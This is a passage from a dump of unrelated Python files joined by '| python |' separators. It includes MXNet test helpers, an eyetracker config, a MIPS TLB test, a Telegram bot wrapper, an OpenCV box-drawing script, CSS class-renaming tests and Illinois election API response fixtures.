[1, 'ant/image_0002.jpg'], [2, 'anchor/image_0001.jpg'], [2, 'anchor/image_0002.jpg']]
return mx.image.ImageIter(2, (3, 224, 224), imglist=image_list, path_root='tests/data/test_images',
label_name='softmax_label')
@staticmethod
def _assert_common_attributes_equal(repurposer1, repurposer2):
assert repurposer1.__dict__.keys() == repurposer2.__dict__.keys()
assert repurposer1._save_source_model_default == repurposer2._save_source_model_default
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_data, repurposer2.provide_data)
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_label, repurposer2.provide_label)
assert repurposer1.get_params() == repurposer2.get_params()
@staticmethod
def assert_provide_equal(provide1, provide2):
if provide1 is None:
assert provide2 is None
return
assert len(provide1) == len(provide2)
assert provide1[0][0] == provide2[0][0]
assert len(provide1[0][1]) == len(provide2[0][1])
@staticmethod
def _remove_files_with_prefix(prefix):
for filename in os.listdir('.'):
if filename.startswith(prefix):
os.remove(filename)
@staticmethod
def download_vgg19():
# Download vgg19 (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-symbol.json')]
@staticmethod
def download_squeezenet():
# Download squeezenet (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-symbol.json')]
@staticmethod
def download_resnet():
# Download reset (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-symbol.json')]
@staticmethod
def unzip_mnist_sample():
zip_ref = zipfile.ZipFile('tests/data/mnist_sample.zip', 'r')
zip_ref.extractall('.')
zip_ref.close()
@staticmethod
def create_img_iter(data_dir, batch_size, label_name='softmax_label'):
# assert dir exists
if not os.path.isdir(data_dir):
raise ValueError('Directory not found: {}'.format(data_dir))
# get class names
classes = [x.split('/')[-1] for x in glob.glob(data_dir+'/*')]
classes.sort()
fnames = []
labels = []
for c in classes:
# get all the image filenames and labels
images = glob.glob(data_dir+'/'+c+'/*')
images.sort()
fnames += images
labels += [c]*len(images)
# create imglist for ImageIter
imglist = []
for label, filename in zip(labels, fnames):
imglist.append([int(label), filename])
random.shuffle(imglist)
# make iterators
iterator = mx.image.ImageIter(batch_size, (3, 224, 224), imglist=imglist, label_name=label_name, path_root='')
return iterator
@staticmethod
def get_labels(iterator):
iterator.reset()
labels = []
while True:
try:
labels = labels + iterator.next().label[0].asnumpy().astype(int).tolist()
except StopIteration:
break
return labels
@staticmethod
def assert_feature_indices_equal(expected_feature_indices, actual_feature_indices):
if not type(expected_feature_indices) == type(actual_feature_indices):
raise AssertionError("Incorrect feature_indices type: {}. Expected: {}"
.format(type(actual_feature_indices), type(expected_feature_indices)))
if not expected_feature_indices.keys() == actual_feature_indices.keys():
raise AssertionError("Incorrect keys in feature_indices: {}. Expected: {}"
.format(actual_feature_indices.keys(), expected_feature_indices.keys()))
for key in expected_feature_indices:
if not np.array_equal(expected_feature_indices[key], actual_feature_indices[key]):
raise AssertionError("Incorrect values in feature_indices dictionary")
@staticmethod
def create_mnist_test_iterator():
# Create data iterator for mnist test images
return mx.io.MNISTIter(image='tests/data/t10k-images-idx3-ubyte', label='tests/data/t10k-labels-idx1-ubyte')
| python |
# Eyetracker type
# EYETRACKER_TYPE = "IS4_Large_Peripheral" # 4C eyetracker
#EYETRACKER_TYPE = "Tobii T120" # Old eyetracker
EYETRACKER_TYPE = "simulation" # test
# EYETRACKER_TYPE = "Tobii Pro X3-120 EPU" # Tobii X3
SCREEN_SIZE_X = 1920
SCREEN_SIZE_Y = 1080
#Pilot condition
PILOT_CONDITION_TEXT_INTERVENTION = True
PILOT_CONDITION_NO_REMOVAL = True
#PILOT_CONDITION_NO_REMOVAL = False
#PILOT mmd subset to load
#PILOT_MMD_SUBSET = [3,9,11,20,27,60,74] #try and ensure 74 is in removal
#PILOT_MMD_SUBSET = [5,28,30,62,66,72,76]
PILOT_MMD_SUBSET = [5]
# Project paths:
# Reference highlighting rules
#RUN USING: python -u experimenter_platform_stage_1_demo.py
if PILOT_CONDITION_TEXT_INTERVENTION:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
else:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
# GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text.db"
if PILOT_CONDITION_TEXT_INTERVENTION:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text_pilot_noremoval.db"
else:
if PILOT_CONDITION_NO_REMOVAL:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_noremoval_test.db"
else:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_removal.db"
# Project paths:
# Reference highlighting rules - SD testing
#RUN USING: python -u experimenter_platform_study_bars_SD.py
#USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight_SD.db"
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_SD_bold1.db"
# Legend highlighting rules
#RUN USING: python -u experimenter_platform_study_1.py
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_legend_highlighting.db"
#USER_MODEL_STATE_PATH = "./database/user_model_state_legend_highlighting.db"
FRONT_END_STATIC_PATH = "./application/frontend/static/"
FRONT_END_TEMPLATE_PATH = "./application/frontend/templates/"
# Platform configuration:
USE_FIXATION_ALGORITHM = True
USE_EMDAT = False
USE_ML = False
USE_KEYBOARD = False
USE_MOUSE = False
# Features to use
USE_PUPIL_FEATURES = True
USE_DISTANCE_FEATURES = True
USE_FIXATION_PATH_FEATURES = True
USE_TRANSITION_AOI_FEATURES = True
# Sets of features to keep
KEEP_TASK_FEATURES = False
KEEP_GLOBAL_FEATURES = False
#Frequency of ML/EMDAT calls:
EMDAT_CALL_PERIOD = 10000
ML_CALL_PERIOD = 6000000
# Some parameter from EMDAT
MAX_SEG_TIMEGAP= 10
# Fixation detector parameters
FIX_MAXDIST = 35
FIX_MINDUR = 100000
REST_PUPIL_SIZE = 0
PUPIL_ADJUSTMENT = "rpscenter"
# The amount of time to wait after starting a new task before starting recording
# fixations (to account for html loading time)
FIX_DETECTION_DELAY = 1000000
#Logs configuration
LOG_PREFIX = "./log/AdaptiveMSNV_log"
# Mouse events
MAX_DOUBLE_CLICK_DUR = 500000
| python |
#-
# Copyright (c) 2013 Robert M. Norton
# All rights reserved.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
# Register assignment:
# a0 - desired epc 1
# a1 - actual epc 1
# a2 - desired badvaddr 1
# a3 - actual badvaddr 1
# a4 - cause 1
# a5 - desired epc 2
# a6 - actual epc 2
# a7 - desired badvaddr 2
# s0 - actual badvaddr 2
# s1 - cause 2
class test_tlb_addrerr_store(BaseBERITestCase):
@attr('tlb')
def test_epc1(self):
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.a1, "Wrong EPC 1")
@attr('tlb')
def test_badvaddr1(self):
'''Test BadVAddr after load from bad user space address'''
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.a3, "Wrong badaddr 1")
@attr('tlb')
def test_cause1(self):
self.assertRegisterMaskEqual(self.MIPS.a4, 0xff, 0x14, "Wrong cause 1")
@attr('tlb')
def test_epc2(self):
self.assertRegisterEqual(self.MIPS.a5, self.MIPS.a6, "Wrong EPC 2")
@attr('tlb')
def test_badvaddr2(self):
'''Test BadVAddr after load from bad kernel space address'''
self.assertRegisterEqual(self.MIPS.a7, self.MIPS.s0, "Wrong badaddr 2")
@attr('tlb')
def test_cause2(self):
self.assertRegisterMaskEqual(self.MIPS.s1, 0xff, 0x14, "Wrong cause 2")
| python |
import os
import telebot
token = os.environ['TELEGRAM_TOKEN']
bot = telebot.TeleBot(token)
def medit(message_text,chat_id, message_id,reply_markup=None,parse_mode=None):
return bot.edit_message_text(chat_id=chat_id,message_id=message_id,text=message_text,reply_markup=reply_markup,
parse_mode=parse_mode)
| python |
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QT4C available.
# Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
# QT4C is licensed under the BSD 3-Clause License, except for the third-party components listed below.
# A copy of the BSD 3-Clause License is included in this file.
#
'''QT4C(Client Driver for QTA)
'''
| python |
from spire.mesh import ModelController
from spire.schema import SchemaDependency
from platoon import resources
from platoon.models import *
class QueueController(ModelController):
resource = resources.Queue
version = (1, 0)
mapping = 'id subject name status'
model = Queue
schema = SchemaDependency('platoon')
def create(self, request, response, subject, data):
session = self.schema.session
subject = self.model.create(session, **data)
session.commit()
response({'id': subject.id})
def update(self, request, response, subject, data):
if not data:
return response({'id': subject.id})
session = self.schema.session
subject.update(session, **data)
session.commit()
response({'id': subject.id})
def _annotate_resource(self, request, model, resource, data):
endpoint = model.endpoint
if endpoint:
resource['endpoint'] = endpoint.extract_dict(exclude='id endpoint_id',
drop_none=True)
| python |
import argparse
import shutil
import errno
import time
import glob
import os
import cv2
import numpy as np
from merge_tools import do_merge_box
DEBUG = True
class MergeBox(object):
def __init__(self):
args = self.parse_arguments()
self.output_dir = args.output_dir
self.input_dir = args.input_dir
def parse_arguments(self):
"""
Parse the command line arguments of the program.
"""
parser = argparse.ArgumentParser(
description="生成labelme 格式数据"
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
nargs="?",
help="输出文件的本地路径",
required=True
)
parser.add_argument(
"-i",
"--input_dir",
type=str,
nargs="?",
help="输入文件路径",
required=True
)
return parser.parse_args()
def parse_file_list(self, input_dir, output_dir):
"""
"""
label_file_list = glob.glob(os.path.join(input_dir, '*.txt'))
for label_file in label_file_list:
real_name = label_file.split('/')[-1].split('.')[0]
image_file = os.path.join(input_dir, "{}.jpg".format(real_name))
label_image_file = os.path.join(output_dir, "{}.jpg".format(real_name))
print(image_file)
if os.path.exists(image_file):
self.draw_box(label_file, image_file, label_image_file)
def draw_box(self, label_file, image_file, label_image_file):
if not os.path.exists(label_file) or not os.path.exists(image_file):
print('【警告】文件不存在 --------file: {} '.format(label_file))
return
with open(label_file, 'r', encoding='utf-8') as f:
lines = f.readlines()
lines = do_merge_box(lines)
bg_image = cv2.imread(image_file)
raw_image = cv2.imread(image_file)
for index, line in enumerate(lines):
if len(line) < 8:
continue
points = line.split(',')
left = int(points[0]) if int(points[6]) > int(points[0]) else int(points[6])
right = int(points[2]) if int(points[4]) < int(points[2]) else int(points[4])
top = int(points[1]) if int(points[3]) > int(points[1]) else int(points[3])
bottom = int(points[5]) if int(points[7]) < int(points[5]) else int(points[7])
height = bottom - top
width = right - left
colors = (0, 0, 255)
if index == 189:
print(line)
print("left={} right={} top={} bottom={}".format(left, right, top, bottom))
# cv2.fillPoly(bg_image, [pts], (255, 255, 255))
roi_corners=np.array([[(int(points[0]), int(points[1])),
(int(points[2]), int(points[3])),
(int(points[4]), int(points[5])),
(int(points[6]), int(points[7]))]], dtype=np.int32)
mask = np.ones(bg_image.shape, dtype=np.uint8)
channels=bg_image.shape[2]
#输入点的坐标
channel_count=channels
ignore_mask_color = (255,)*channel_count
#创建mask层
cv2.fillPoly(mask, roi_corners, ignore_mask_color)
#为每个像素进行与操作,除mask区域外,全为0
masked_image = cv2.bitwise_and(bg_image, mask)
c_img = masked_image[top: int(top + height), left: int(left + width)]
cv2.imwrite(os.path.join(self.output_dir, '{}.jpg'.format(index)), c_img)
# 画矩形框
pts = np.array([[int(points[0]), int(points[1])],
[int(points[2]), int(points[3])],
[int(points[4]), int(points[5])],
[int(points[6]), int(points[7])]], np.int32) # 每个点都是(x, y)
pts = roi_corners.reshape((-1, 1, 2))
cv2.polylines(bg_image, [pts], True, (0, 0, 255))
# cv2.rectangle(bg_image, (left, top), (left+width, top+height), colors, 1)
cv2.imwrite(label_image_file, bg_image)
print('【输出】生成合格后的图片{} .'.format(label_image_file))
def main(self):
time_start = time.time()
# Argument parsing
args = self.parse_arguments()
if os.path.exists(args.output_dir):
shutil.rmtree(args.output_dir)
try:
os.makedirs(args.output_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.exists(args.input_dir):
print("输入路径不能为空 input_dir[{}] ".format(args.input_dir))
return
self.parse_file_list(args.input_dir, args.output_dir)
time_elapsed = time.time() - time_start
print('The code run {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
if __name__ == "__main__":
mergeBox = MergeBox()
mergeBox.main() | python |
"""Tests"""
import unittest
from html_classes_obfuscator import html_classes_obfuscator
class TestsGenerateCSS(unittest.TestCase):
"""Tests
Args:
unittest (unittest.TestCase): Unittest library
"""
def test_generate_css_simple_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello{color:blue}', {"hello": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_double_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world{color:blue}', {"hello": "test_1", "world": "test_2"})
expected_new_css = '.test_1 .test_2{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_tailwind_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css(r'.lg\:1\/4{color:blue}', {"lg:1/4": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_pseudo_elements_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world:not(.not_me, div){color:blue}', {"hello": "test_1", "world": "test_2", "not_me": "test_3"})
expected_new_css = '.test_1 .test_2:not(.test_3, div){color:blue}'
self.assertEqual(new_css, expected_new_css)
| python |
import urllib.request
def obtain_webpage(url: str):
return urllib.request.urlopen(url)
| python |
filepath = 'Prometheus_Unbound.txt'
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
print("Line {}: {}".format(cnt, line.strip()))
line = fp.readline()
cnt += 1
| python |
# Time: O(nlogn)
# Space: O(n)
import collections
# hash, sort
class Solution(object):
def findWinners(self, matches):
"""
:type matches: List[List[int]]
:rtype: List[List[int]]
"""
lose = collections.defaultdict(int)
players_set = set()
for x, y in matches:
lose[y] += 1
players_set.add(x)
players_set.add(y)
return [[x for x in sorted(players_set) if lose[x] == i] for i in xrange(2)]
| python |
# flake8: noqa
elections_resp = {
'kind': 'civicinfo#electionsQueryResponse',
'elections': [{
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
}, {
'id': '4803',
'name': 'Los Angeles County Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4804',
'name': 'Oklahoma Special Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ok'
}, {
'id': '4810',
'name': 'Oregon County Special Elections',
'electionDay': '2019-05-21',
'ocdDivisionId': 'ocd-division/country:us/state:or'
}, {
'id': '4811',
'name': 'Los Angeles County Special Election',
'electionDay': '2019-06-04',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4823',
'name': '9th Congressional District Primary Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:nc/cd:9'
}]
}
voterinfo_resp = {
'kind': 'civicinfo#voterInfoResponse',
'election': {
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
},
'normalizedInput': {
'line1': '900 North Washtenaw Avenue',
'city': 'Chicago',
'state': 'IL',
'zip': '60622'
},
'pollingLocations': [{
'address': {
'locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'line1': '904 N WASHTENAW AVE',
'city': 'CHICAGO',
'state': 'IL',
'zip': '60622'
},
'notes': '',
'pollingHours': '',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
}],
'contests': [{
'type': 'General',
'office': 'United States Senator',
'level': ['country'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'James D. "Jim" Oberweis',
'party': 'Republican',
'candidateUrl': 'http://jimoberweis.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Oberweis2014'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Oberweis2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCOVqW3lh9q9cnk-R2NedLTw'
}]
}, {
'name': 'Richard J. Durbin',
'party': 'Democratic',
'candidateUrl': 'http://www.dickdurbin.com/home',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dickdurbin'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/DickDurbin'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SenatorDickDurbin'
}]
}, {
'name': 'Sharon Hansen',
'party': 'Libertarian',
'candidateUrl': 'http://www.sharonhansenforussenate.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/USSenate2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/nairotci'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'US House of Representatives - District 7',
'level': ['country'],
'roles': ['legislatorLowerBody'],
'district': {
'name': "Illinois's 7th congressional district",
'scope': 'congressional',
'id': 'ocd-division/country:us/state:il/cd:7'
},
'candidates': [{
'name': 'Danny K. Davis',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dkdforcongress'
}]
}, {
'name': 'Robert L. Bumpers',
'party': 'Republican'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Governor/ Lieutenant Governor',
'level': ['administrativeArea1'],
'roles': ['headOfGovernment'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Bruce Rauner/ Evelyn Sanguinetti',
'party': 'Republican',
'candidateUrl': 'http://brucerauner.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/BruceRauner'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/BruceRauner'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117459818564381220425'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/brucerauner'
}]
}, {
'name': 'Chad Grimm/ Alexander Cummings',
'party': 'Libertarian',
'candidateUrl': 'http://www.grimmforliberty.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/grimmforgovernor'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/GrimmForLiberty'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118063028184706045944'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UC7RjCAp7oAGM8iykNl5aCsQ'
}]
}, {
'name': 'Pat Quinn/ Paul Vallas',
'party': 'Democratic',
'candidateUrl': 'https://www.quinnforillinois.com/00/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/quinnforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/quinnforil'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/QuinnForIllinois'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Comptroller',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Judy Baar Topinka',
'party': 'Republican',
'candidateUrl': 'http://judybaartopinka.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/153417423039'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ElectTopinka'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118116620949235387993'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCfbQXLS2yrY1wAJQH2oq4Kg'
}]
}, {
'name': 'Julie Fox',
'party': 'Libertarian',
'candidateUrl': 'http://juliefox2014.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/154063524725251'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JulieFox1214'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/+Juliefox2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCz2A7-6e0_pJJ10bXvBvcIA'
}]
}, {
'name': 'Sheila Simon',
'party': 'Democratic',
'candidateUrl': 'http://www.sheilasimon.org',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/SheilaSimonIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/SheilaSimonIL'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SheilaSimonIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Secretary Of State',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Christopher Michel',
'party': 'Libertarian',
'candidateUrl': 'http://chrisforillinois.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ChrisMichelforIllinois'
}]
}, {
'name': 'Jesse White',
'party': 'Democratic'
}, {
'name': 'Michael Webster',
'party': 'Republican',
'candidateUrl': 'http://websterforillinois.net/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/MikeWebsterIL'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/MikeWebsterIL'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106530502764515758186'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/MikeWebsterIL'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Attorney General',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Ben Koyl',
'party': 'Libertarian',
'candidateUrl': 'http://koyl4ilattorneygeneral.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Koyl4AttorneyGeneral'
}]
}, {
'name': 'Lisa Madigan',
'party': 'Democratic',
'candidateUrl': 'http://lisamadigan.org/splash',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/lisamadigan'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/LisaMadigan'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/106732728212286274178'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/LisaMadigan'
}]
}, {
'name': 'Paul M. Schimpf',
'party': 'Republican',
'candidateUrl': 'http://www.schimpf4illinois.com/contact_us?splash=1',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/136912986515438'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Schimpf_4_IL_AG'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Treasurer',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Matthew Skopek',
'party': 'Libertarian',
'candidateUrl': 'http://www.matthewskopek.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/TransparentandResponsibleGoverment'
}]
}, {
'name': 'Michael W. Frerichs',
'party': 'Democratic',
'candidateUrl': 'http://frerichsforillinois.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/mikeforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/mikeforillinois'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/116963380840614292664'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCX77L5usHWxrr0BdOv0r8Dg'
}]
}, {
'name': 'Tom Cross',
'party': 'Republican',
'candidateUrl': 'http://jointomcross.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/JoinTomCross'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JoinTomCross'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117776663930603924689'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCDBLEvIGHJX1kIc_eZL5qPw'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'State House - District 4',
'level': ['administrativeArea1'],
'roles': ['legislatorLowerBody'],
'district': {
'name': 'Illinois State House district 4',
'scope': 'stateLower',
'id': 'ocd-division/country:us/state:il/sldl:4'
},
'candidates': [{
'name': 'Cynthia Soto',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Treasurer',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maria Pappas',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Clerk',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'David D. Orr',
'party': 'Democratic',
'candidateUrl': 'http://www.davidorr.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ClerkOrr'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/cookcountyclerk'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/TheDavidOrr'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Sheriff',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Dart',
'party': 'Democratic',
'candidateUrl': 'http://www.sherifftomdart.com/',
'channels': [{
'type': 'Twitter',
'id': 'https://twitter.com/TomDart'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Assessor',
'level': ['administrativeArea2'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Joseph Berrios',
'party': 'Democratic',
'candidateUrl': 'http://www.electjoeberrios.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook County Board President',
'level': ['administrativeArea2'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Toni Preckwinkle',
'party': 'Democratic',
'candidateUrl': 'http://www.tonipreckwinkle.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/196166530417661'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ToniPreckwinkle'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Arnold Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Bridget Anne Mitchell',
'party': 'Democratic',
'candidateUrl': 'http://mitchellforjudge.com',
'email': '[email protected]'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Reyes Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Diana Rosario',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Howse, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Caroline Kate Moreland',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/judgemoreland'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Neville, Jr. Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
